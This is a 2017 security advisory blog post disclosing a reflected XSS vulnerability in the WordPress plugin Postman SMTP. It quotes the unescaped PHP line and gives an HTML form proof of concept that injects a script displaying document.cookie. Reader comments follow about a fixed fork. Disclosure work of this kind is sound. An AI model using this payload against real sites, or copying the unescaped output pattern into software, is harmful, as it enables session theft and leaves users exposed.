29 Jun 2017

Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP

We recently found the the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.

On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php the value of GET or POST input “page” is output without being escaped:

value="<?php echo $_REQUEST['page'] ?>" />

While the GET input “page” needs to be set to “postman_email_log” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.

The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

10 thoughts on “Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP

  1. Hi,
    Thank you for disclosing this vulnerability. This morning I was able to contact “Postman SMTP” developer, Jason Hendriks –although it was not an easy task ;)–. He was not aware of the fact his plugin had recently been removed from the official WordPress plugins directory. He said he would take a look.

    One more thing, would this be a good fix?
    value=”” />
    (credits to @jasonpomerleau)

  2. Pingback: The High Cost of Free Plugins - Awesome Support

  3. Someone named Yehuda Hassine has uploaded a fixed version in GitHub (https://github.com/yehudah/Postman-SMTP).

    I can see he has modified the following files:
    • /Postman-Auth/PostmanGoogleAuthenticationManager.php
    • /Postman-Auth/PostmanMicrosoftAuthenticationManager.php
    • /Postman-Auth/PostmanYahooAuthenticationManager.php
    • /Postman-Email-Log/PostmanEmailLogController.php
    • /Postman-Email-Log/PostmanEmailLogService.php
    • /PostmanAjaxController.php
    • /PostmanUtils.php

    He has used FILTER_SANITIZE_STRING and intval.

  4. BIG NEWS!

    The fork (fixed version of “Postman SMTP Mailer/Email Log”) by Yehuda Hassine (props to him!) has got approved in the WordPress Directory. Fortunately, in the end, “Postman SMTP Mailer/Email Log” is going to survive, under the name of “Post SMTP Mailer/Email Log”. You can find it in https://wordpress.org/plugins/post-smtp/.

    The Github repo has been moved here: https://github.com/yehudah/Post-SMTP.

    Long life to Post SMTP Mailer/Email Log!

    Thank you @yehudah!

Leave a Reply

Your email address will not be published.